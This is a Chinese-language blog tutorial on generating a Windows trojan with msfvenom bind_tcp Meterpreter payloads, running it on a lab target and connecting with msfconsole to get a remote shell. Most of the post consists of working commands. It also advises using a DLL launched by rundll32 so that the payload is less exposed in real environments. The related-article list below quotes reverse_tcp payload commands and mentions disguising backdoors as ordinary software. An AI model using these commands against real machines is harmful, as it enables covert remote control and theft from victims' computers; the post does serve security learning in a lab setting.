msfconsole之制作windows木马并成功获取shell(正向payload)

于 2024-05-27 18:31:29 发布
阅读量749 收藏 19
点赞数 14
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75387456/article/details/139243703
版权
  • 使用场景:
    场景还是得具体看,⽐如⽬标机器不给其他除特定端⼝外的端⼝出站,那就 只能能正向;还有⽐如 有⼀种情 况,⽬标处于深层⽹络,不能直接连通外⽹,也不能通过其他机器连通,因 为其他机器 防⽕墙都开着,为避免在有防⽕墙监控的情况下关闭防⽕墙⽽被发现,也只能⽤正向的⻢,然后通过开着防⽕墙的机器来进⾏端⼝的转发达到穿透的⽬的。

        生成exe文件

  • msfvenom ⽣成正向 Paylaod
    msfvenom -p windows/meterpreter/bind_tcp LPORT= -f exe >/root/bind_xx.exe
    msfvenom -p windows/x64/meterpreter/bind_tcp LPORT= -f exe >/root/bind_xx.exe
    msfvenom -p windows/meterpreter/bind_tcp LPORT= -f dll >/root/bind_xx.dll
    msfvenom -p windows/x64/meterpreter/bind_tcp LPORT= -f dll >/root/bind_xx.dll
    msfvenom -p linux/x64/meterpreter/bind_tcp LPORT= -f elf >/root/bind_xx.elf
    msfvenom -p linux/x86/meterpreter/bind_tcp LPORT= -f elf >/root/bind_xx.elf
    根据靶机系统选择相应的命令,我的靶机用的是win10 x64的系统,所以我选择这条命令:
    msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5555 -f exe >bind.exe
    端口(lport)随便设置就行
    将生成的文件在靶机中打开,利用netstat -ano查看打开的端口
    可以看到目标端口已经打开
    接下来打开msfconsole对虚拟机进⾏连接(前提是对⽅防火墙是关闭了的)
    相关命令:
            msfconsole
            use  exploit/multi/handler        //进入exploit模块
            set payload windows/x64/meterpreter/bind_tcp        //生成exe时相同的协议
            show options        
            set lport 5555        //自己设置的端口
            set rhost 192.168.5.144        //靶机的ip
            run        //运行         
        
        成功获取shell权限:
        
        这个时候就反弹回来了⼀个Meterpreter 会话回来!
        同时,靶机win10 那边就没有对 5555 端⼝进⾏连接了!
                
        
因为⽤了 5555 端⼝启⽤监听后,只会接收⼀次数据,⽆论成功或者失败,它 都不会再监听了! 也就是
说,如果连接失败了,那么就再运⾏然后再连接⼀次!
这是 Metasploit ⽣成正向的过程!
尽量不要⽣成 exe
在真实环境中,如果使⽤ msfvenom ⽣成了⼀个正向 Paylaod 格式是 exe ,那么在进程中就会暴露!
⼀般⽤就⽤ dll
要运⾏ dll 必须使⽤ rundll32.exe start:
rundll32.exe 文件在 C:\Windows\System32\rundll32.exe:
命令:rundll32.exe C:\Users\xiao\Desktop\bind.dll,start
使用方法就是 rundll32.exe xxx.dll,Start
Meterpreter 这边也是反弹了⼀个 shell 回来
这就是正向连接
雷宝SF
关注
  • 14
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用msfvenom获取windows shell
赴前尘
06-26 710
使用msfvenom获取windows shell
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole(msf渗透神器)window版本,稀缺资源。
msfconsole制作windows木马成功获取shell反向payload)
最新发布
2201_75387456的博客
05-27 467
相关命令:msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.5.129 LPORT=7680 -f exe > win012.exe。set PAYLOAD windows/meterpreter/reverse_tcp //和上面msfvenom使用 的payload相同。set lhost 192.168.5.129 //kali的ip。需要注意这里的lhost填写的是kali的ip。3.进入msfconsole设置。
msf制作简单的windows exe木马
weixin_73942557的博客
10-25 708
msf制作Windows可执行程序木马并利用。首先利用用组件msfvenom制作木马。然后将生成的木马放到你准备的靶机上面。设置payload、监听IP和端口。在靶机上运行生成的木马文件。进入msfconsole。-p设置payload。然后设置返回IP和端口。-f设置生成木马的类型。使用exploit利用。-o设置路径和文件名。目前就已经提权成功了。
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 4278
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
msfconsole制作windows木马成功获取shell
qq_56228347的博客
11-22 3526
msfconsole制作windows木马并上线获取控制权限
55.Windows漏洞利用之构建ROP链绕过DEP并获取Shell1
08-03
本文主要介绍了如何在Windows环境中利用漏洞,尤其是针对DEP(Data Execution Prevention)堆栈执行保护机制,通过构建ROP(Return-Oriented Programming)链来绕过防御,并最终获取Shell。以下是对文章内容的详细...
msfconsole讲解.pptx
09-27
hack -msf 木马生成精讲,PPT MSF全称msfconsoleMsfconsole提供了...通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。 MSF有免费和收费两种版本,收费版本具有免杀功能。
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
05-10
77-77.渗透测试-msfconsole漏洞利用流程上.mp4
Winpayloads:无法检测到Windows有效负载生成
02-06
在Python2.7上运行的Extras无法检测到Windows有效负载生成 像往常一样,不要将有效负载上传到任何在线病毒检查器 病毒总数检测-更新25/01/2019-16/68检测 对于完全无法检测到的有效负载,请使用登台器功能 码头工人...
如何使用kali中msfconsole软件生成木马shell和meterpreter类型)投放至本机进行控制???超级详细!!!
2301_77578012的博客
05-05 540
msf的使用
kali中使用msf制作Windows恶意软件获取shell
weixin_43894771的博客
03-09 1135
1.1制作Windows恶意软件获取shell 后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为 思路就是利用社会工程学中人的心理,去为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell 1.1.1生成西瓜影音.exe后门程序 1.1.2在MSF上启动handler开始监听后门程序 1.1.3在Kali上...
MSF制作Windows客户端恶意软件获取SHELL过程
永远是少年
06-10 1076
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF制作Windows客户端恶意软件获取SHELL。 一、后门程序生成 二、MSF监听 三、效果检验 (一)MSF监听结果 (二)恶意软件扫描
msfconsole制作后台木马获取靶机shell
weixin_41038905的博客
03-20 2477
利用kali 制作木马 root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=***.***.*.*** LPORT=**** -f exe -o /root/test.exe 生成一个木马程序test.exe,没有添加任何免杀,很容易被安全软件检测出,这里先介绍一下...
MSF基于JAVA的漏洞获取shell实战
永远是少年
06-13 703
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF基于JAVA的漏洞获取shell实战。 一、环境准备 二、MSF设置 三、效果检验
msf正向shell的使用
shy的博客
09-28 8680
场景:经常使用msf生成后门文件获取shell,但是经常使用的都是反弹shell,reverse_tcp。突然之间遇到了一个场景,由于目标服务器不能出网,只能使用正向shell,这时才发现,自己对于正向shell,一无所知。 1,生成正向shell后门文件 msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe 2,上传到目标机器上 3.配置监听(很重要) 4,运行目标机上的后门文件,获取shell 1,2是正向sh.
MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 7282
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
[ MSF使用实例 ] 利用永恒之黑采用正向连接 shell 获得主机权限(CVE-2020-0796)(SMBGhost)
qq_51577576的博客
10-19 1114
[ MSF使用实例 ] 利用利用SMBv3远程代码执行漏洞(SMBGhost)(CVE-2020-0796)(永恒之黑)采用正向连接 shell 获得主机权限 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 SMBGhost
53.Windows漏洞利用之Metasploit实现栈溢出攻击及反弹shell1
08-03
接着,作者进行了一个简单的栈溢出实验,展示了如何通过Msfconsole(Metasploit框架的命令行界面)创建payload,让恶意代码能够通过溢出攻击覆盖目标程序的栈区域,进而控制程序流程。溢出攻击通常利用内存中的缓冲...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值